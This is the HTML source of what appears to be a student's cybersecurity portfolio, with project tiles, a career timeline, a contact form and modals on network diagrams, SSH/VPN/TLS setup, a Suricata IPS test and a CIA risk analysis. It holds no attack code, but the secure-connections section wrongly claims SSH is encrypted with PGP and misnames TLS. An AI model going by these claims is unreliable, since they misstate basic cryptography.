          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network scanning and enumeration</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal15">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/15-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network sniffing and spoofing</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal16">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/16-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Law, Ethics and Responsible Disclosure</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal17">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
           </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/17-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Basic hacking process</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal18">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/18-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Self reflection</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Internship</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal19">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/internship/19-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S5</h4>
          <p class="text-muted">My internship</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Minor</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Red teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal20">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/20-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pentesting methods</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal21">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Linux write-up</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal22">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
           <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Windows write-up</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal23">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/23-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal24">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis session</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal25">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/25-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Personal pen-test toolbox</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal26">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/26-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security of IOT protocols and technology</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal27">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/27-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pen-test at COMPANY_NAME_HERE</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal28">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a smartphone app</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal29">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a website</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal30">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a device</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal31">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Organize a weekly Hack The Box event</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Blue teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal32">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/32-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal33">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">IDS technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal34">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/34-thumbnail.svg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Monitoring technologies</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal35">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/35-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">SIEM technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal36">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/36-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Threat use cases</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal37">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Developing and tuning an IDS</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal38">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
           <img class="img-fluid" src="img/portfolio/minor/blue/38-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Setting up a SOC</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal39">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/39-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability scanning</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal40">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/40-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security monitoring, analysis and triage</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Forensics specialisation</h5>
          </div>
          </div>
          </div>
          </section>
          
          <section id="about">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About</h2>
          <h3 class="section-subheading text-muted">My cyber security career.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <ul class="timeline">
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/1.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S3 2019</h4>
          <h4 class="subheading">The beginning</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was the first time I got experienced the cyber security stream and what it had to offer. I learned the basics of the defensive side of cyber security.</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/2.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S4 2020</h4>
          <h4 class="subheading">Round 2</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was my second semester on cyber security this time focusing on the offensive side.</p>
          </div>
          </div>
          </li>
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/3.png" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S5 2021</h4>
          <h4 class="subheading">The internship</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/4.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S7 2021</h4>
          <h4 class="subheading">My minor</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          
          <li class="timeline-inverted">
          <div class="timeline-image">
          <h4>The
          <br>Future
          </h4>
          </div>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="team">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About me</h2>
          <h3 class="section-subheading text-muted">Some additional links and information.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-sm-4">
          
          </div>
          <div class="col-sm-4">
          <div class="team-member">
          <img class="mx-auto rounded-circle" src="img/team/Pim.jpg" alt="">
          <h4>Pim Beekmans</h4>
          <p class="text-muted">Student</p>
          <ul class="list-inline social-buttons">
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-twitter"></i>
          </a>
          </li>
          <li class="list-inline-item">
           <a href="#">
          <i class="fab fa-facebook-f"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="https://www.linkedin.com/in/pim-beekmans/?originalSubdomain=nl">
          <i class="fab fa-linkedin-in"></i>
          </a>
          </li>
          </ul>
          </div>
          </div>
          <div class="col-sm-4">
          
          </div>
          <div class="row">
          <div class="col-lg-8 mx-auto text-center">
          <p class="large text-muted">This is me, thank you for reading, hopefully you've liked my portfolio on cyber security. For additional feedback feel free to send an email to <a href="/cdn-cgi/l/email-protection#ddadb4b09dbfb8b8b6b0bcb3aef3b9b8ab"><span class="__cf_email__" data-cfemail="1a6a73775a787f7f71777b7469347e7f6c">[email&#160;protected]</span></a>.</p>
          </div>
          </div>
          </div>
          </div>
          </section>
          
          <section class="py-5">
          <div class="container">
          <div class="row">
          
          </div>
          </div>
          </section>
          
          <section id="contact">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Contact Me</h2>
          <br>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <form id="contactForm" name="sentMessage" novalidate="novalidate">
          <div class="row">
          <div class="col-md-6">
          <div class="form-group">
          <input class="form-control" id="name" type="text" placeholder="Your Name *" required="required" data-validation-required-message="Please enter your name.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="email" type="email" placeholder="Your Email *" required="required" data-validation-required-message="Please enter your email address.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="phone" type="tel" placeholder="Your Phone *" required="required" data-validation-required-message="Please enter your phone number.">
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="col-md-6">
          <div class="form-group">
          <textarea class="form-control" id="message" placeholder="Your Message *" required="required" data-validation-required-message="Please enter a message."></textarea>
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="clearfix"></div>
          <div class="col-lg-12 text-center">
          <div id="success"></div>
          <button id="sendMessageButton" class="btn btn-primary btn-xl text-uppercase" type="submit">Send Message</button>
          </div>
          </div>
          </form>
          </div>
          </div>
          </div>
          </section>
          
          <footer>
          <div class="container">
          <div class="row">
          <div class="col-md-4">
          <span class="copyright">Copyright &copy; Beekmans.dev 2019</span>
          </div>
          <div class="col-md-4">
          
          </div>
          <div class="col-md-4">
          <ul class="list-inline quicklinks">
          <li class="list-inline-item">
          <a href="#">Privacy Policy</a>
          </li>
          <li class="list-inline-item">
          <a href="#">Terms of Use</a>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </footer>
          
          
          <div class="portfolio-modal modal fade" id="portfolioModal1" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Self Assessment</h2>
          <p class="item-intro text-muted">Week 1</p>
          <p>
          <ol>
          <li>What did you like / or find easy?</li>
          <li>What did you find difficult? At what point did it get too difficult for now?</li>
          <li>
          Then check the list of learning subjects for the basic knowledge assignment and
          possibilities and requirements for the project.
          <ul>
          <li>What subjects do you already know and what is unknown terrain for you?</li>
          </ul>
          </li>
          <li>What parts of the current semester would you like to give much attention?</li>
          <li>What do you want to achieve and learn in particular?</li>
          <li>Which study style and corresponding planning is most suitable for you?</li>
          <li>What would you like to do or achieve in the project? (subjects, type of project,
          domain to work in, learning goals, etc.)
          </li>
          </ol>
          <br>
          Answers:
          <br>
           <ol>
          <li>I like working with servers and playing with my network at home and virtual
          machines. I think I find basic networking the easiest.
          </li>
          <li>Advanced networking all knowledge that I know is self-taught so I think there is a
          lot I don’t know yet. I got stuck on virtual lans and ip routing at home what else
          I’ll find difficult is what I need to find out in the distant future.
          </li>
          <li>
          Subjects:
          <div class="container">
          <div class="row">
          <div class="col-sm-4">
          <ul>
          Used:
          <li>VMWare</li>
          <li>Linux</li>
          <li>IPv4</li>
          <li>NAT</li>
          <li>TCP/IP</li>
          <li>DNS</li>
          <li>HTTP</li>
          <li>FTP</li>
          <li>Firewalls</li>
          <li>HTTPS</li>
          <li>VPN</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Know about but never used:
          <li>VMWare ESX</li>
          <li>Wireshark</li>
          <li>ARP</li>
          <li>IP routing</li>
          <li>SMTP</li>
          <li>IDS</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Never heard about it:
          <li>Seclab</li>
          <li>ICMP ping</li>
          <li>CIA and IT Risk analysis</li>
          </ul>
          </div>
          </div>
          </div>
          </li>
          <li>Advanced networking and the transition to Java.</li>
          <li>How to be a good Cyber security expert.</li>
          <li>Style 2, I’ll try to find out if this is the most suitable for me and maybe go to
          the style 3 courses on the days I get subjects I already know.
          </li>
          <li>I don’t really have a preference I want to learn as much as possible related to
          cyber security.
          </li>
          </ol>
          </p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
           <li>Client: Fontys</li>
          <li>Category: Self assessment</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal2" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagram.png" alt="">
          <p>This network diagram shows 3 main VLAN's containing a employee environment for the
          employees to work on, a guest environment for the people visiting the company as guests
          and a DMZ for the servers and services to the outside world.</p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal3" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram V2</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagramV2.png" alt="">
          <p>This is the second version of my network diagram. I changed a few things to match
          Casper's feedback. The first thing I changed are the firewalls, I only needed to address
          the physical firewall and not the ones for every single interface. The last thing was I
          added the corresponding IP ranges and subnets to each VLAN.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal4" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Secure connections</p>
          <a href="../../img/portfolio/blue/sshAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sshAccess.png" alt=""></a>
          <p>Here you can see that I made a SSH connection to my Ubuntu webserver. I use Putty as my
          SSH terminal. SSH is encrypted using PGP (Pretty good privacy) which uses a public and a
          private key to communicate with each other. This is especially helpful because you don't
          need to transfer passwords to encrypt the connection. The sending client encrypts its
          message using the public key from the recipient and the recipient decrypts the message
          using its own private key. This works the same the other way around. I can use this
          technique to remotely manage my webservers without the need physical access.</p>
          <a href="../../img/portfolio/blue/vpnAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/vpnAccess.png" alt=""></a>
          <p>Here you can see that I'm connected to a VPN. This VPN is OpenVPN and runs on the PfSense
          router. It gives me access to the subnets I gave it access to and with this I can
          remotely manage my whole network, with being actually physically connected to the
          network. The OpenVPN connection is encrypted be TLS (Transfer layer security) which is
          successor from SSL. TLS uses a handshake at the start of the connection where a key is
          shared between the 2 clients. This key will be used for the symmetric encryption of the
          messages. The authenticity of the connection is secured by a certificate and the public
          key of the webserver this prevents possible man in the middle attacks, where someone
          will pretend to be another website for example.</p>
          <a href="../../img/portfolio/blue/sslConnection.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sslConnection.png" alt=""></a>
          <p>Here you can see the ssl certificate I created for the website that is running my
          portfolio. I created the script using certbot in Ubuntu and the CA is Let's encrypt
          authority x3. The website automatically forces all traffic to https, the website is
          still accessible by http but will redirect the user to https.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Secure connections</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal5" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IDS/IPS</p>
          <P>I implemented Suricata as my IPS, I thought it would be the best option because they say
          it's more advanced and newer. Below you can see some prove of the implementation and
          some results I came across.</P>
          <a href="../../img/portfolio/blue/Suricata1.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata1.png" alt=""></a>
          <p>I configured the IPS to monitor the WAN and LAN interface for now but I'm planning to
          configure it to the Employee VLAN as well. This will protect the company for any
          potential threats from the inside.</p>
          <a href="../../img/portfolio/blue/Suricata2.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata2.png" alt=""></a>
          <p>I tested the IPS with a website called <a href="https://www.wicar.org/">Wicar</a>. On
          this website you can run malicious code and test you network without it being an actual
          threat or risk.</p>
          <a href="../../img/portfolio/blue/Suricata3.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata3.png" alt=""></a>
          <p>I have used the Snort community rules and the Emerging threats rules these are both free
          to use and do a decent job of protecting the network with not too many false
          positives.</p>
          <a href="../../img/portfolio/blue/DDOSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/DDOSAlert.png" alt=""></a>
          <p>We encountered a real world scenario which actually turned out to work really well with
          an IPS. Bram tried to DDOS my website while it was running in my pfsense environment.
          The IPS immediately noticed this and blocked his IP. While the website was running
          outside the pfsense zone Bram could DDOS all he want without getting blocked.</p>
          <a href="../../img/portfolio/blue/BlockList.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BlockList.png" alt=""></a>
          <p>Here you can see Bram's IP in the Suricata blocklist.</p>
          <a href="../../img/portfolio/blue/Bram'sIP.jpg"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Bram'sIP.jpg" alt=""></a>
          <p>This is a screenshot from Bram's computer with his IP he used for generating the
          alert.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: IDS/IPS</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal6" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Information Security and Risk Analysis</p>
          <h3>CIA</h3>
          <h4>Confidentiality:</h4>
          <p>The company will hold confidential data from costumers, things like credit card
          information user accounts and databases for the costumer's websites.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Costumer data .... Leak</li>
          </ul>
          <h4>Integrity:</h4>
          <p>The costumers trust the company to secure their servers on their end and they trust the
          company that it won't sell any costumer data to 3rd parties.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Correct .... Tampering</li>
          </ul>
          <h4>Availability:</h4>
          <p>Because the costumers might use these websites for commercial use, it is at the utmost
          importance that the websites are fast, reliable and 24/7 reachable.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
           <li>Well timed .... Delay</li>
          <li>Continuity .... Downtime</li>
          </ul>
          <p>Click on this <a href="../../img/portfolio/Risk%20analysis.xlsx">link</a> to download the full
          risk analysis.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Risk Analysis</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
